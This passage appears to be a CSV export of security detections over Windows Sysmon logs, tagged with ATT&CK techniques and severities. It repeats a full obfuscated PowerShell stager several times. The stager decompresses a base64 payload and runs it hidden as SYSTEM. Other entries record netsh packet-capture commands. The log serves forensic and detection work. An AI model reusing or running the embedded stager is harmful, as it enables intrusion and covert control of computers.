2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9808 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.965 + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4946 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.273 + 747F3D96-6646-5D3F-0000-0010A7318B00 + 4148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace show status + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9808 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.965 + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4945 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.245 + 747F3D96-6646-5D3F-0000-0010E32E8B00 + 5084 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh